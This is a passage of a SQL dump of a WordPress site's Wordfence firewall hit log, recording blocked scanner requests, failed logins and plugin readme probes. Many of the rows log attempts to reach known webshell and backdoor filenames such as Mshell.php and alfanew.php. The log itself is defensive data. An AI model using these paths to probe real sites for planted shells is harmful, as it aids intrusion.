(50714, 1711841634.478059, 1711841633.378600, '\0\0\0\0\0\0\0\0\0\0ÿÿÕÊé"', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50639, 1711731932.149360, 1711731931.784300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8veG1ybHBjLnBocA==","category":"brute-force","ssl":1}'),
(50715, 1711858476.888069, 1711858476.261300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50640, 1711731930.386593, 1711731930.028000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/network/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vbmV0d29yay94bXJscGMucGhw","category":"brute-force","ssl":1}'),
(50641, 1711731928.197571, 1711731927.832600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-includes/js/tinymce/skins/lightgray/img/index.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtaW5jbHVkZXMvanMvdGlueW1jZS9za2lucy9saWdodGdyYXkvaW1nL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50846, 1712062379.405115, 1712062378.915100, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50706, 1711810293.881079, 1711810293.391800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/twentyseventeen/page/index.php?p=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNldmVudGVlbi9wYWdlL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50642, 1711731924.632855, 1711731924.202500, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-head.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtaGVhZC5waHA=","category":"brute-force","ssl":1}'),
(50960, 1712207674.127558, 1712207673.725900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50589, 0.000000, 1711690127.964012, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÖ©', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50590, 1711720399.698386, 1711720399.373100, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50584, 1711672824.167362, 1711672823.780000, '\0\0\0\0\0\0\0\0\0\0ÿÿYlmk', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50686, 1711791136.349934, 1711791136.012100, '\0\0\0\0\0\0\0\0\0\0ÿÿÕÊé"', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50668, 1711731882.397887, 1711731881.967400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///yanz.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8veWFuei5waHA=","category":"brute-force","ssl":1}'),
(50448, 1711359182.680323, 1711359182.200000, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-security.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNlY3VyaXR5LnBocA==","category":"brute-force","ssl":1}'),
(50806, 1712000167.942408, 1712000166.971300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50579, 0.000000, 1711657534.082927, '\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ét', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50580, 0.000000, 1711667104.208294, '\0\0\0\0\0\0\0\0\0\0ÿÿKw“$', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'loginFailInvalidUsername', NULL, NULL),
(51716, 1712368118.404469, 1712368118.100100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-warfare/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:85.0) Gecko/20100101 Firefox/85.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtd2FyZmFyZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtd2FyZmFyZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(51753, 1712368254.858136, 1712368254.529900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-property/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/82.0 Mobile/16H20 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wcm9wZXJ0eS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wcm9wZXJ0eS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50659, 1711731897.121559, 1711731896.796900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///admin-post.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWRtaW4tcG9zdC5waHA=","category":"brute-force","ssl":1}'),
(51755, 1712369822.929970, 1712369822.435600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/Mshell.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L01zaGVsbC5waHA=","category":"brute-force","ssl":1}'),
(51754, 0.000000, 1712369425.589076, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50463, 1711359009.973135, 1711359009.616400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-hudbud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWh1ZGJ1ZC5waHA=","category":"brute-force","ssl":1}'),
(50464, 1711358992.647199, 1711358992.333200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/classsmtps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzc210cHMucGhw","category":"brute-force","ssl":1}'),
(50465, 1711358979.819647, 1711358979.556600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/test.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Rlc3QucGhw","category":"brute-force","ssl":1}'),
(50459, 1711359141.514923, 1711359141.191400, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/wpclassic/inc/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3dwY2xhc3NpYy9pbmMvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51030, 0.000000, 1712307178.228262, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51031, 0.000000, 1712309334.701186, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51032, 1712310123.819044, 1712310123.448000, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51033, 1712310121.856222, 1712310121.489600, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(51324, 0.000000, 1712320122.452404, '\0\0\0\0\0\0\0\0\0\0ÿÿV|Ž/', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51048, 1712316549.863038, 1712316549.578800, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRggezu.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSZ2dlenUucGhw","category":"brute-force","ssl":1}'),
(51034, 1712310119.800245, 1712310119.512000, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', 